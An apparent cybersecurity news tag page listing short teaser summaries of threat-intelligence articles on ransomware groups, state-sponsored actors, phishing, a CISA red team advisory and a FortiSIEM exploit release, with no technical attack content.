On July 11, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA) detailing the Tactics, Techniques and Procedures (TTPs), mitigation strategies, and detection methods associated with a red team assessment carried out by CISA against a Federal Civilian Executive Branch (FCEB) organization.…
Tag: SIEM
Summary
Insikt Group's research reveals that OilAlpha, a likely pro-Houthi group, continues to target humanitarian and human rights organizations operating in Yemen. They use malicious Android applications to steal credentials and gather intelligence, potentially to control aid distribution. Notable organizations affected include CARE International and the Norwegian Refugee Council.…
July 10, 2024
tldr: Threat actors today are evolving new tactics in order to evade traditional AV detections. Let’s dive into a technique growing in popularity: fileless code execution through the Windows registry.…
In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture.…
Nefilim is a Ransomware-as-a-Service (RaaS) operation that emerged in March 2020 and is believed to have evolved from the Nemty ransomware family. This attribution is due to the fact that Nefilim arose at the time when Nemty’s operators decided to quit the RaaS business model to concentrate their efforts on more selective attacks with more dedicated resources.…
Threat Intelligence, or just TI, is sometimes criticized for possibly being inaccurate or outdated. However, there are compelling reasons to incorporate it into your cybersecurity defense strategy. Let’s present some ways to use TI effectively as part of your security operations lifecycle.…
Sandworm is a highly sophisticated Russian adversary, active since at least 2009, that has been attributed to Russia’s Main Intelligence Directorate (GRU) for Special Technologies (GTsST) military Unit 74455.
Sandworm is characterized by the use of malware families specifically designed to compromise Industrial Control System (ICS) and Supervisory Control and Data Acquisition (SCADA) systems found in entities located in the Energy, Government, and Media sectors.…
Cyber threats are becoming increasingly sophisticated and frequent, making it imperative for organizations to leverage cyber threat intelligence to stay ahead of potential cyber attacks. Organizations across all industries are recognizing the importance of implementing robust threat intelligence solutions to stay ahead of cybercriminals and protect their valuable assets.…
Summary: A recent supply chain attack conducted through multiple CDNs has been traced back to a common operator, impacting a large number of websites.
Threat Actor: Unknown | Supply Chain Attack Victim: Multiple websites | Websites affected by supply chain attack
Key Point :
A large-scale supply chain attack was conducted through multiple CDNs, affecting tens of millions of websites.…Phishing is a formidable–and financially devastating–threat costing organizations $4.76 million USD per breach on average. With a simple, deceptive email, adversaries can masquerade as trusted entities, tricking even savvy individuals into handing over their credentials and other sensitive information. Whether it’s a duplicitous link or a crafty call to action, phishing remains one of the most insidious cybersecurity threats, leveraging a vulnerability that can’t be patched: human nature.…
Phishing is the weapon of choice for many adversaries. And it’s easy to understand why: Users fall victim to attacks in under 60 seconds on average, novice cybercriminals can launch effective phishing campaigns thanks to off-the-shelf phishing kits and generative AI, and above all, it works — 71% of organizations reported at least one successful attack in 2023.…
Summary: This content provides an overview of Zeek, an open-source network analysis framework that operates as a versatile sensor to monitor network traffic and generate comprehensive logs and output for analysis.
Threat Actor: N/A
Victim: N/A
Key Point :
Zeek is an open-source network analysis framework that operates as a versatile sensor to monitor network traffic.…From November 2023 to April 2024, Insikt Group identified cyber-espionage activities conducted by RedJuliett, a likely Chinese state-sponsored group, primarily targeting government, academic, technology, and diplomatic organizations in Taiwan. RedJuliett exploited known vulnerabilities in network edge devices such as firewalls, virtual private networks (VPNs), and load balancers for initial access.…
Recent history could be termed the Age of Ransomware in the realm of cybercrime. However, threat actors have discovered a way to profit without the need for malware development or sophisticated methods. SpaceBears is a new participant in the Data Broker trend, which has gained momentum particularly due to major crackdowns on ransomware groups by security forces.…
Winnti is a notorious adversary that has been operational since at least 2010 and is believed to be operating in coordination with or supported by the Chinese government. The group has conducted cyber espionage and financially motivated activities across various industries, including technology, healthcare, and pharmaceuticals.…
Summary: This content discusses the importance of process mapping in cybersecurity and how it can revolutionize understanding and managing the security landscape.
Threat Actor: N/A Victim: N/A
Key Point :
Cybersecurity is not just about firewalls and antivirus, but also about understanding how defenses, people, and processes work together.…On Substack, publications run by cybersecurity professionals and journalists with expertise in cybersecurity can help practitioners keep pace with developments in security operations and many other areas of cybersecurity.…
Summary: The BlackSuit ransomware gang has leaked stolen data from attacks against 53 organizations over the course of a year.
Threat Actor: BlackSuit ransomware gang | BlackSuit ransomware gang Victim: 53 organizations | 53 organizations
Key Point :
The BlackSuit ransomware gang, believed to be spun off from the Royal ransomware gang, primarily targets US-based companies in critical sectors such as education and industrial goods.…Summary: Security researchers have released a proof-of-concept exploit for a remote code execution vulnerability in Fortinet’s SIEM solution, which allows executing commands as root on Internet-facing FortiSIEM appliances.
Threat Actor: Horizon3’s Attack Team | Horizon3’s Attack Team Victim: Fortinet | Fortinet
Key Point :
A proof-of-concept exploit has been released for a remote code execution vulnerability in Fortinet’s SIEM solution.…Artificial Intelligence (AI) is increasingly being integrated into various industries, and cybersecurity is no exception. This article delves into the potential of AI to transform the cybersecurity landscape, addressing common concerns and highlighting the areas where AI is already making significant contributions.
AI’s Impact on Cybersecurity Jobs Will AI Overtake Cybersecurity in the Next Five Years?…